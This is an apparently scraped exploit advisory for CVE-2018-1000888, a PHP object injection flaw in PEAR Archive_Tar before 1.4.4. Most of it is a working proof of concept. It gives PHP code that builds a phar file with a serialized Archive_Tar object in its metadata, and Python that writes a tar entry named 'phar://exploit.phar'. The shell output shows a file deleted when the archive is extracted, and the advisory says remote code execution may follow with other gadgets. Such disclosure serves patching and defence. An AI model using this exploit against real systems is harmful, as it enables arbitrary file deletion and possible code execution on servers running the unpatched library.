扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 |
PEAR Archive_Tar < 1.4.4 - PHP Object Injection Date: January 10, 2019 Author: farisv Vendor Homepage: https://pear.php.net/package/Archive_Tar/ Vulnerable Package Link: http://download.pear.php.net/package/Archive_Tar-1.4.3.tgz CVE: CVE-2018-1000888 In PEAR Archive_Tar before 1.4.4, there are several file operation with <code>$v_header['filename']</code> as parameter (such as file_exists, is_file, is_dir, etc). When extract() is called without a specific prefix path, we can trigger phar induced unserialization by crafting a tar file with <code>phar://[path_to_malicious_phar_file]</code> as path name. Object injection can be used to trigger destructor/wakeup method in the loaded PHP classes, e.g. the Archive_Tar class itself. With Archive_Tar itself, we can trigger arbitrary file deletion because <code>@unlink($this->_temp_tarname)</code> will be called in the destructor method. If another class with useful gadget is loaded, remote code execution may be possible. Steps to reproduce object injection and arbitrary file deletion: 1. Make sure that PHP & PEAR are installed. 2. Download vulnerable PEAR Archive_Tar. $ wget http://download.pear.php.net/package/Archive_Tar-1.4.3.tgz $ tar xfz Archive_Tar-1.4.3.tgz $ cd Archive_Tar-1.4.3 3. Create vulnerable code (vulnerable.php). </code><code> <?php require 'Archive/Tar.php'; $exploit = new Archive_Tar('exploit.tar'); $exploit->extract(); </code><code> 4. Create dummy file /tmp/test. $ touch /tmp/test 5. Genereate exploit.phar with the following PHP code and place the exploit.phar in the same directory with vulnerable.php. </code><code> <?php class Archive_Tar { public $_temp_tarname; } $phar = new Phar('exploit.phar'); $phar->startBuffering(); $phar->addFromString('test.txt', 'text'); $phar->setStub('<?php __HALT_COMPILER(); ? >'); $object = new Archive_Tar; $object->_temp_tarname = '/tmp/test'; $phar->setMetadata($object); $phar->stopBuffering(); </code><code> 6. Create exploit.tar with the following Python code. </code><code> import tarfile tf = tarfile.open('exploit.tar', 'w') tf.add('/dev/null', 'phar://exploit.phar') tf.close() </code><code> 7. Execute vulnerable.php to trigger object injection to delete /tmp/test. $ ls -alt /tmp/test -rw-rw-r-- 1 vagrant vagrant 0 Jan9 16:41 /tmp/test $ php vulnerable.php $ ls -alt /tmp/test ls: cannot access '/tmp/test': No such file or directory |
体验盒子
